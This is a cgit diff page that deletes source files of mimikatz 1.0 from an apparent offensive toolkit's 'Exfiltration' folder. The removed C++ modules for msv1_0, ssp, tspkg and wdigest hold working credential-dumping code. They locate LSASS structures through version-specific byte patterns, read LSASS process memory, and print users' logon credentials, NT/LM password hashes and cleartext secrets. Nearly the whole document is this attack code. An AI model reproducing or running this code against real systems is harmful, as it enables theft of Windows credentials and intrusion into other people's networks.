- } else (*outputStream) << L"n.e. (Lecture Block Credentials KO)";
-
- delete [] monBuffer;
- } else (*outputStream) << L"n.s. (Block Credentials KO)";
-
- return true;
-}
-
-void mod_mimikatz_sekurlsa_msv1_0::NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, bool relative)
-{
- if(String->Buffer)
- String->Buffer = reinterpret_cast<wchar_t *>(reinterpret_cast<ULONG_PTR>(String->Buffer) + ((relative ? -1 : 1) * reinterpret_cast<ULONG_PTR>(BaseAddress)));
-} \ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.h
deleted file mode 100644
index cf8ccac..0000000
--- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.h
+++ /dev/null
@@ -1,105 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
- Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#pragma once
-#include "../mod_mimikatz_sekurlsa.h"
-
-class mod_mimikatz_sekurlsa_msv1_0 {
-
-private:
- typedef struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS {
- PVOID unk0; // next?
- LSA_UNICODE_STRING Primary;
- LSA_UNICODE_STRING Credentials;
- } KIWI_MSV1_0_PRIMARY_CREDENTIALS, *PKIWI_MSV1_0_PRIMARY_CREDENTIALS;
-
- typedef struct _KIWI_MSV1_0_CREDENTIALS {
- PVOID unk0; // next?
- DWORD AuthenticationPackageId;
- PVOID PrimaryCredentials;
- } KIWI_MSV1_0_CREDENTIALS, *PKIWI_MSV1_0_CREDENTIALS;
-
- typedef struct _KIWI_MSV1_0_LIST_5 {
- struct _KIWI_MSV1_0_LIST_5 *Flink;
- struct _KIWI_MSV1_0_LIST_5 *Blink;
- LUID LocallyUniqueIdentifier;
- LSA_UNICODE_STRING UserName;
- LSA_UNICODE_STRING Domaine;
- PVOID unk14; // 0
- PVOID unk15; // 0
- PVOID unk16; // offset unk_181A080
- DWORD unk17; // 0Ah
- DWORD unk18; // 2
- #ifdef _M_IX86
- DWORD unk19;
- #endif
- DWORD unk20; // 5AC4186Ch
- DWORD unk21; // 1CD6BFDh
- LSA_UNICODE_STRING LogonServer;
- PKIWI_MSV1_0_CREDENTIALS Credentials;
- PVOID unk22; // 0C14h
- PVOID unk23; // 0BFCh
- } KIWI_MSV1_0_LIST_5, *PKIWI_MSV1_0_LIST_5;
-
- typedef struct _KIWI_MSV1_0_LIST_6 {
- struct _KIWI_MSV1_0_LIST_6 *Flink;
- struct _KIWI_MSV1_0_LIST_6 *Blink;
- PVOID unk0; // unk_18457A0
- DWORD unk1; // 0FFFFFFFFh
- DWORD unk2; // 0
- PVOID unk3; // 0
- PVOID unk4; // 0
- PVOID unk5; // 0
- PVOID unk6; // 0C04h
- PVOID unk7; // 0
- PVOID unk8; // 0C08h
- PVOID unk9; // 0
- PVOID unk10; // 0
- DWORD unk11; // 0
- DWORD unk12; // 0
- PVOID unk13; // offset off_18456A0
- LUID LocallyUniqueIdentifier;
- LUID SecondaryLocallyUniqueIdentifier;
- LSA_UNICODE_STRING UserName;
- LSA_UNICODE_STRING Domaine;
- PVOID unk14; // 0 Windows 8 + 2*PVOID / 4*PVOID!!
- PVOID unk15; // 0
- PVOID unk16; // offset unk_181A080
- DWORD unk17; // 0Ah
- DWORD unk18; // 2
- #ifdef _M_IX86
- DWORD unk19;
- #endif
- DWORD unk20; // 5AC4186Ch
- DWORD unk21; // 1CD6BFDh
- LSA_UNICODE_STRING LogonServer;
- PKIWI_MSV1_0_CREDENTIALS Credentials;
- PVOID unk22; // 0C14h
- PVOID unk23; // 0BFCh
- } KIWI_MSV1_0_LIST_6, *PKIWI_MSV1_0_LIST_6;
-
- typedef struct _MSV1_0_PRIMARY_CREDENTIAL {
- LSA_UNICODE_STRING LogonDomainName;
- LSA_UNICODE_STRING UserName;
- BYTE NtOwfPassword[0x10];
- BYTE LmOwfPassword[0x10];
- BOOLEAN NtPasswordPresent;
- BOOLEAN LmPasswordPresent;
- wchar_t BuffDomaine[MAX_DOMAIN_LEN];
- wchar_t BuffUserName[MAX_USERNAME_LEN];
- } MSV1_0_PRIMARY_CREDENTIAL, *PMSV1_0_PRIMARY_CREDENTIAL;
-
- static void NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, bool relative = true);
-
- static PLIST_ENTRY LogonSessionList;
- static PULONG LogonSessionListCount;
- static bool searchLogonSessionList();
-
- static bool decryptAndDisplayCredsBlock(LSA_UNICODE_STRING * monBlock, bool justSecurity);
-public:
- static bool getMSV(vector<wstring> * arguments);
- static bool WINAPI getMSVLogonData(__in PLUID logId, __in bool justSecurity);
-}; \ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.cpp
deleted file mode 100644
index 86dab86..0000000
--- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.cpp
+++ /dev/null
@@ -1,92 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
- Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#include "ssp.h"
-#include "..\..\global.h"
-mod_process::PKIWI_VERY_BASIC_MODULEENTRY mod_mimikatz_sekurlsa_ssp::pModMSV = NULL;
-mod_mimikatz_sekurlsa_ssp::PKIWI_SSP_CREDENTIAL_LIST_ENTRY mod_mimikatz_sekurlsa_ssp::SspCredentialList = NULL;
-
-bool mod_mimikatz_sekurlsa_ssp::getSSP(vector<wstring> * arguments)
-{
- vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider;
- monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getSSPLogonData, wstring(L"ssp")));
- return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider);
-}
-
-bool mod_mimikatz_sekurlsa_ssp::searchSSPEntryList()
-{
-#ifdef _M_X64
- BYTE PTRN_WIN5_SspCredentialList[]= {0xc7, 0x43, 0x24, 0x43, 0x72, 0x64, 0x41, 0xff, 0x15};
- LONG OFFS_WIN5_SspCredentialList = sizeof(PTRN_WIN5_SspCredentialList) + 4 + 3;
- BYTE PTRN_WIN6_SspCredentialList[]= {0xc7, 0x47, 0x24, 0x43, 0x72, 0x64, 0x41, 0x48, 0x89, 0x47, 0x78, 0xff, 0x15};
- LONG OFFS_WIN6_SspCredentialList = sizeof(PTRN_WIN6_SspCredentialList) + 4 + 3;
-#elif defined _M_IX86
- BYTE PTRN_WALL_SspCredentialList[]= {0x1c, 0x43, 0x72, 0x64, 0x41, 0xff, 0x15};
- LONG OFFS_WALL_SspCredentialList = sizeof(PTRN_WALL_SspCredentialList) + 4 + 1;
-#endif
-
- if(mod_mimikatz_sekurlsa::searchLSASSDatas() && pModMSV && !SspCredentialList)
- {
- PBYTE *pointeur = NULL; PBYTE pattern = NULL; ULONG taille = 0; LONG offset = 0;
- pointeur= reinterpret_cast<PBYTE *>(&SspCredentialList);
-
-#ifdef _M_X64
- if(mod_system::GLOB_Version.dwMajorVersion < 6)
- {
- pattern = PTRN_WIN5_SspCredentialList;
- taille = sizeof(PTRN_WIN5_SspCredentialList);
- offset = OFFS_WIN5_SspCredentialList;
- }
- else
- {
- pattern = PTRN_WIN6_SspCredentialList;
- taille = sizeof(PTRN_WIN6_SspCredentialList);
- offset = OFFS_WIN6_SspCredentialList;
- }
-#elif defined _M_IX86
- pattern = PTRN_WALL_SspCredentialList;
- taille = sizeof(PTRN_WALL_SspCredentialList);
- offset = OFFS_WALL_SspCredentialList;
-#endif
- if(HMODULE monModule = LoadLibrary(L"msv1_0"))
- {
- MODULEINFO mesInfos;
- if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO)))
- {
- mod_memory::genericPatternSearch(pointeur, L"msv1_0", pattern, taille, offset);
- *pointeur += pModMSV->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll);
- }
- FreeLibrary(monModule);
- }
- }
- return (SspCredentialList != NULL);
-}
-
-bool WINAPI mod_mimikatz_sekurlsa_ssp::getSSPLogonData(__in PLUID logId, __in bool justSecurity)
-{
- if(searchSSPEntryList())
- {
- KIWI_SSP_CREDENTIAL_LIST_ENTRY mesCredentials;
- DWORD monNb = 0;
- if(mod_memory::readMemory(SspCredentialList, &mesCredentials, sizeof(LIST_ENTRY), mod_mimikatz_sekurlsa::hLSASS))
- {
- while(mesCredentials.Flink != SspCredentialList)
- {
- if(mod_memory::readMemory(mesCredentials.Flink, &mesCredentials, sizeof(KIWI_SSP_CREDENTIAL_LIST_ENTRY), mod_mimikatz_sekurlsa::hLSASS))
- {
- if(RtlEqualLuid(logId, &(mesCredentials.LogonId)))
- {
- mod_mimikatz_sekurlsa::genericCredsToStream(&mesCredentials.credentials, justSecurity, true, &monNb);
- monNb++;
- }
- }
- }
- }
- }
- else (*outputStream) << L"n.a. (SSP KO)";
-
- return true;
-} \ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.h
deleted file mode 100644
index d2d5396..0000000
--- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.h
+++ /dev/null
@@ -1,32 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
- Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#pragma once
-#include "../mod_mimikatz_sekurlsa.h"
-
-class mod_mimikatz_sekurlsa_ssp {
-
-private:
- typedef struct _KIWI_SSP_CREDENTIAL_LIST_ENTRY {
- struct _KIWI_SSP_CREDENTIAL_LIST_ENTRY *Flink;
- struct _KIWI_SSP_CREDENTIAL_LIST_ENTRY *Blink;
- ULONG References;
- ULONG CredentialReferences;
- LUID LogonId;
- ULONG unk0;
- ULONG unk1;
- ULONG unk2;
- KIWI_GENERIC_PRIMARY_CREDENTIAL credentials;
- } KIWI_SSP_CREDENTIAL_LIST_ENTRY, *PKIWI_SSP_CREDENTIAL_LIST_ENTRY;
-
- static PKIWI_SSP_CREDENTIAL_LIST_ENTRY SspCredentialList;
- static bool searchSSPEntryList();
-
-public:
- static mod_process::PKIWI_VERY_BASIC_MODULEENTRY pModMSV;
- static bool getSSP(vector<wstring> * arguments);
- static bool WINAPI getSSPLogonData(__in PLUID logId, __in bool justSecurity);
-};
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.cpp
deleted file mode 100644
index 71e3751..0000000
--- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.cpp
+++ /dev/null
@@ -1,94 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
- Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#include "tspkg.h"
-#include "..\..\global.h"
-mod_process::PKIWI_VERY_BASIC_MODULEENTRY mod_mimikatz_sekurlsa_tspkg::pModTSPKG = NULL;
-PRTL_AVL_TABLE mod_mimikatz_sekurlsa_tspkg::TSGlobalCredTable = NULL; //reinterpret_cast<PRTL_AVL_TABLE>(NULL);
-
-bool mod_mimikatz_sekurlsa_tspkg::getTsPkg(vector<wstring> * arguments)
-{
- vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider;
- monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getTsPkgLogonData, wstring(L"tspkg")));
- return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider);
-}
-
-bool mod_mimikatz_sekurlsa_tspkg::searchTSPKGFuncs()
-{
-#ifdef _M_X64
- BYTE PTRN_WALL_TSGlobalCredTable[] = {0x48, 0x83, 0xec, 0x20, 0x48, 0x8d, 0x0d};
- LONG OFFS_WALL_TSGlobalCredTable = sizeof(PTRN_WALL_TSGlobalCredTable);
-#elif defined _M_IX86
- BYTE PTRN_WNO8_TSGlobalCredTable[] = {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x51, 0x56, 0xbe};
- LONG OFFS_WNO8_TSGlobalCredTable = sizeof(PTRN_WNO8_TSGlobalCredTable);
-
- BYTE PTRN_WIN8_TSGlobalCredTable[] = {0x8b, 0xff, 0x53, 0xbb};
- LONG OFFS_WIN8_TSGlobalCredTable = sizeof(PTRN_WIN8_TSGlobalCredTable);
-#endif
-
- if(mod_mimikatz_sekurlsa::searchLSASSDatas() && pModTSPKG && !TSGlobalCredTable)
- {
- PBYTE *pointeur = NULL; PBYTE pattern = NULL; ULONG taille = 0; LONG offset = 0;
-
- pointeur= reinterpret_cast<PBYTE *>(&TSGlobalCredTable);
-#ifdef _M_X64
- pattern = PTRN_WALL_TSGlobalCredTable;
- taille = sizeof(PTRN_WALL_TSGlobalCredTable);
- offset = OFFS_WALL_TSGlobalCredTable;
-#elif defined _M_IX86
- if(mod_system::GLOB_Version.dwBuildNumber < 8000)
- {
- pattern = PTRN_WNO8_TSGlobalCredTable;
- taille = sizeof(PTRN_WNO8_TSGlobalCredTable);
- offset = OFFS_WNO8_TSGlobalCredTable;
- }
- else
- {
- pattern = PTRN_WIN8_TSGlobalCredTable;
- taille = sizeof(PTRN_WIN8_TSGlobalCredTable);
- offset = OFFS_WIN8_TSGlobalCredTable;
- }
-#endif
-
- if(HMODULE monModule = LoadLibrary(L"tspkg"))
- {
- MODULEINFO mesInfos;
- if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO)))
- {
- mod_memory::genericPatternSearch(pointeur, L"tspkg", pattern, taille, offset);
- *pointeur += pModTSPKG->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll);
- }
- FreeLibrary(monModule);
- }
- }
- return (pModTSPKG && TSGlobalCredTable);
-}
-
-bool WINAPI mod_mimikatz_sekurlsa_tspkg::getTsPkgLogonData(__in PLUID logId, __in bool justSecurity)
-{
- if(searchTSPKGFuncs())
- {
- PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds = NULL;
- BYTE * monBuffP = new BYTE[sizeof(KIWI_TS_CREDENTIAL)], * monBuffC = new BYTE[sizeof(KIWI_TS_PRIMARY_CREDENTIAL)];
- if(PKIWI_TS_CREDENTIAL pLogSession = reinterpret_cast<PKIWI_TS_CREDENTIAL>(mod_mimikatz_sekurlsa::getPtrFromAVLByLuid(TSGlobalCredTable, FIELD_OFFSET(KIWI_TS_CREDENTIAL, LocallyUniqueIdentifier), logId)))
- {
- if(mod_memory::readMemory(pLogSession, monBuffP, sizeof(KIWI_TS_CREDENTIAL), mod_mimikatz_sekurlsa::hLSASS))
- {
- pLogSession = reinterpret_cast<PKIWI_TS_CREDENTIAL>(monBuffP);
- if(pLogSession->pTsPrimary)
- {
- if(mod_memory::readMemory(pLogSession->pTsPrimary, monBuffC, sizeof(KIWI_TS_PRIMARY_CREDENTIAL), mod_mimikatz_sekurlsa::hLSASS))
- mesCreds = &(reinterpret_cast<PKIWI_TS_PRIMARY_CREDENTIAL>(monBuffC)->credentials);
- }
- else (*outputStream) << L"n.s. (SuppCred KO) / ";
- }
- }
- mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity, true);
- delete [] monBuffC, monBuffP;
- }
- else (*outputStream) << L"n.a. (tspkg KO)";
- return true;
-}
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.h
deleted file mode 100644
index 35a3b15..0000000
--- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.h
+++ /dev/null
@@ -1,37 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
- Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#pragma once
-#include "../mod_mimikatz_sekurlsa.h"
-
-class mod_mimikatz_sekurlsa_tspkg {
-
-private:
- typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
- PVOID unk0; // lock ?
- KIWI_GENERIC_PRIMARY_CREDENTIAL credentials;
- } KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;
-
- typedef struct _KIWI_TS_CREDENTIAL {
- #ifdef _M_X64
- BYTE unk0[108];
- #elif defined _M_IX86
- BYTE unk0[64];
- #endif
- LUID LocallyUniqueIdentifier;
- PVOID unk1;
- PVOID unk2;
- PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
- } KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
-
- static PRTL_AVL_TABLE TSGlobalCredTable;
- static bool searchTSPKGFuncs();
-
-public:
- static mod_process::PKIWI_VERY_BASIC_MODULEENTRY pModTSPKG;
- static bool getTsPkg(vector<wstring> * arguments);
- static bool WINAPI getTsPkgLogonData(__in PLUID logId, __in bool justSecurity);
-};
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.cpp
deleted file mode 100644
index b6e3062..0000000
--- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.cpp
+++ /dev/null
@@ -1,91 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
- Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#include "wdigest.h"
-#include "..\..\global.h"
-mod_process::PKIWI_VERY_BASIC_MODULEENTRY mod_mimikatz_sekurlsa_wdigest::pModWDIGEST = NULL;
-mod_mimikatz_sekurlsa_wdigest::PKIWI_WDIGEST_LIST_ENTRY mod_mimikatz_sekurlsa_wdigest::l_LogSessList = NULL;
-long mod_mimikatz_sekurlsa_wdigest::offsetWDigestPrimary = 0;
-
-bool mod_mimikatz_sekurlsa_wdigest::getWDigest(vector<wstring> * arguments)
-{
- vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider;
- monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getWDigestLogonData, wstring(L"wdigest")));
- return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider);
-}
-
-bool mod_mimikatz_sekurlsa_wdigest::searchWDigestEntryList()
-{
-#ifdef _M_X64
- BYTE PTRN_WNO8_InsertInLogSess[]= {0x4c, 0x89, 0x1b, 0x48, 0x89, 0x43, 0x08, 0x49, 0x89, 0x5b, 0x08, 0x48, 0x8d};
- BYTE PTRN_W8CP_InsertInLogSess[]= {0x4c, 0x89, 0x1b, 0x48, 0x89, 0x4b, 0x08, 0x49, 0x8b, 0x43, 0x08, 0x4c, 0x39};
- BYTE PTRN_W8RP_InsertInLogSess[]= {0x4c, 0x89, 0x1b, 0x48, 0x89, 0x43, 0x08, 0x49, 0x39, 0x43, 0x08, 0x0f, 0x85};
-#elif defined _M_IX86
- BYTE PTRN_WNO8_InsertInLogSess[]= {0x8b, 0x45, 0x08, 0x89, 0x08, 0xc7, 0x40, 0x04};
- BYTE PTRN_W8CP_InsertInLogSess[]= {0x89, 0x0e, 0x89, 0x56, 0x04, 0x8b, 0x41, 0x04};
- BYTE PTRN_W8RP_InsertInLogSess[]= {0x89, 0x06, 0x89, 0x4e, 0x04, 0x39, 0x48, 0x04};
-#endif
- LONG OFFS_WALL_InsertInLogSess = -4;
-
- if(mod_mimikatz_sekurlsa::searchLSASSDatas() && pModWDIGEST && !l_LogSessList)
- {
- PBYTE *pointeur = NULL; PBYTE pattern = NULL; ULONG taille = 0; LONG offset = 0;
-
- pointeur= reinterpret_cast<PBYTE *>(&l_LogSessList);
- offset = OFFS_WALL_InsertInLogSess;
- if(mod_system::GLOB_Version.dwBuildNumber < 8000)
- {
- pattern = PTRN_WNO8_InsertInLogSess;
- taille = sizeof(PTRN_WNO8_InsertInLogSess);
- }
- else if(mod_system::GLOB_Version.dwBuildNumber < 8400)
- {
- pattern = PTRN_W8CP_InsertInLogSess;
- taille = sizeof(PTRN_W8CP_InsertInLogSess);
- }
- else
- {
- pattern = PTRN_W8RP_InsertInLogSess;
- taille = sizeof(PTRN_W8RP_InsertInLogSess);
- }
-
- if(HMODULE monModule = LoadLibrary(L"wdigest"))
- {
- MODULEINFO mesInfos;
- if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO)))
- {
- mod_memory::genericPatternSearch(pointeur, L"wdigest", pattern, taille, offset, "SpInstanceInit", false);
- *pointeur += pModWDIGEST->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll);
- }
- FreeLibrary(monModule);
- }
-
-#ifdef _M_X64
- offsetWDigestPrimary = ((mod_system::GLOB_Version.dwMajorVersion < 6) ? ((mod_system::GLOB_Version.dwMinorVersion < 2) ? 36 : 48) : 48);
-#elif defined _M_IX86
- offsetWDigestPrimary = ((mod_system::GLOB_Version.dwMajorVersion < 6) ? ((mod_system::GLOB_Version.dwMinorVersion < 2) ? 36 : 28) : 32);
-#endif
- }
- return (pModWDIGEST && l_LogSessList);
-}
-
-bool WINAPI mod_mimikatz_sekurlsa_wdigest::getWDigestLogonData(__in PLUID logId, __in bool justSecurity)
-{
- if(searchWDigestEntryList())
- {
- PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds = NULL;
- DWORD taille = offsetWDigestPrimary + sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL);
- BYTE * monBuff = new BYTE[taille];
- if(PLIST_ENTRY pLogSession = mod_mimikatz_sekurlsa::getPtrFromLinkedListByLuid(reinterpret_cast<PLIST_ENTRY>(l_LogSessList), FIELD_OFFSET(KIWI_WDIGEST_LIST_ENTRY, LocallyUniqueIdentifier), logId))
- if( mod_memory::readMemory(pLogSession, monBuff, taille, mod_mimikatz_sekurlsa::hLSASS))
- mesCreds = reinterpret_cast<PKIWI_GENERIC_PRIMARY_CREDENTIAL>(reinterpret_cast<PBYTE>(monBuff) + offsetWDigestPrimary);
- mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity);
- delete [] monBuff;
- }
- else (*outputStream) << L"n.a. (wdigest KO)";
-
- return true;
-}
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.h
deleted file mode 100644
index 9db3c8b..0000000
--- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.h
+++ /dev/null
@@ -1,29 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
- Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#pragma once
-#include "../mod_mimikatz_sekurlsa.h"
-
-class mod_mimikatz_sekurlsa_wdigest {
-
-private:
- typedef struct _KIWI_WDIGEST_LIST_ENTRY {
- struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
- struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
- DWORD UsageCount;
- struct _KIWI_WDIGEST_LIST_ENTRY *This;
- LUID LocallyUniqueIdentifier;
- } KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
-
- static PKIWI_WDIGEST_LIST_ENTRY l_LogSessList;
- static long offsetWDigestPrimary;
- static bool searchWDigestEntryList();
-
-public:
- static mod_process::PKIWI_VERY_BASIC_MODULEENTRY pModWDIGEST;
- static bool getWDigest(vector<wstring> * arguments);
- static bool WINAPI getWDigestLogonData(__in PLUID logId, __in bool justSecurity);
-}; \ No newline at end of file
generated by cgit v1.2.3 (git 2.39.1) at 2025-10-31 03:41:00 +0000